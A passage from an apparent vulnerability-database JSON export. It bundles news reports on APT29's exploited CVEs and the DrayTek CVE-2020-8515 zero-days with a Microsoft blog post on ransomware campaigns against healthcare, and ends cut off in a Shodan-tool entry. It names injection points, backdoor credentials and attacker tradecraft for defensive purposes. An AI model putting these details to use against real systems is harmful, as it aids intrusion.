(Microsoft).\n\n[](<https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway \n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-15T16:55:00", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-04T10:27:04", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:32", "description": "[](<https://thehackernews.com/images/-Z_aTWSdaH3I/Xn5uoGxc-nI/AAAAAAAA2mQ/5EcPBIwVTiMspvURwUA6ipAwRq2Y0if6QCLcBGAsYHQ/s728-e100/enterprise-network-security.jpg>)\n\nCybersecurity researchers with Qihoo 360's NetLab today unveiled details of two recently spotted zero-day cyberattack campaigns in the wild targeting enterprise-grade networking devices manufactured by Taiwan-based DrayTek. \n \nAccording to the [report](<https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/>), at least two separate groups of hackers exploited two critical remote command injection vulnerabilities (**CVE-2020-8515**) affecting DrayTek Vigor enterprise switches, load-balancers, routers and VPN gateway devices to eavesdrop on network traffic and install backdoors. \n \nThe zero-day attacks started somewhere at the end of last November or at the beginning of December and are potentially still ongoing against thousands of publicly exposed **DrayTek switche**s, **Vigor 2960, 3900, 300B** devices that haven't yet been patched with the latest [firmware updates](<https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-\\(cve-2020-8515\\)/>) released last month. \n \nThe zero-day vulnerabilities in question can be exploited by any unauthorized remote attackers to inject and execute arbitrary commands on the system, as also [detailed](<https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html>) by a separate researcher on his blog. \n \n\n\n[](<https://thehackernews.com/images/-DRxfF61iipo/Xn5pKPGZFXI/AAAAAAAA2l8/i4zTHgnWUvwCZFYZ1zp7vLAb3_s-gtAhwCLcBGAsYHQ/s728-e100/router-switch-vpn-hacking.jpg>)\n\n \n\"The two 0-day vulnerability command injection points are keyPath and rtick, located in the /www/cgi-bin/mainfunction.cgi, and the corresponding Web Server program is /usr/sbin/lighttpd,\" the report says. \n \n\n\n[](<https://thehackernews.com/images/-c5Tx0EJ_oWs/Xn5pfYEbGaI/AAAAAAAA2mE/X0ifY4aD5ic8XJ2PYH3pofnfuJ5nNVFdQCLcBGAsYHQ/s728-e100/malware-attack.jpg>)\n\n \nNetLab researchers have not yet attributed both attacks to any specific group, but it did confirm that while the first group simply spied on the network traffic, the second group of attackers used rtick command injection vulnerability to create: \n \n\n\n * the web-session backdoor that never expires,\n * SSH backdoor on TCP ports 22335 and 32459,\n * system backdoor account with user \"wuwuhanhan\" and password \"caonimuqin.\"\n \nTo be noted, if you have just recently installed the patched firmware, or installing now, it won't remove backdoor accounts automatically in case you're already compromised. \n \n\"We recommend that DrayTek Vigor users check and update their firmware in a timely manner and check whether there is a tcpdump process, SSH backdoor account, Web Session backdoor, etc. on their systems.\" \n \n\"If you have remote access enabled on your router, disable it if you don't need it, and use an access control list if possible,\" the company suggests. \n \nThe list of affected firmware versions are as follow: \n \n\n\n * Vigor2960 < v1.5.1\n * Vigor300B < v1.5.1\n * Vigor3900 < v1.5.1\n * VigorSwitch20P2121 <= v2.3.2\n * VigorSwitch20G1280 <= v2.3.2\n * VigorSwitch20P1280 <= v2.3.2\n * VigorSwitch20G2280 <= v2.3.2\n * VigorSwitch20P2280 <= v2.3.2\n \nAffected companies and individuals are highly recommended to install the latest firmware updates to completely protect their valuable networks against malware and emerging online threats. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-27T21:22:00", "type": "thn", "title": "Hackers Exploit Zero-Day Bugs in Draytek Devices to Target Enterprise Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-03-29T18:22:23", "id": "THN:7312C296214FCDE145DA02B933FB28F6", "href": "https://thehackernews.com/2020/03/draytek-network-hacking.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:27", "description": "[](<https://3.bp.blogspot.com/-HfvtRTCYnTM/YZ3QJbhSs3I/AAAAAAAA4AU/kC3BBy581dgTiAKCIDOlmGtohgCXuQhlgCK4BGAYYCw/s1600/ShonyDanza_1_shonydanza_demo-780791.gif>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure 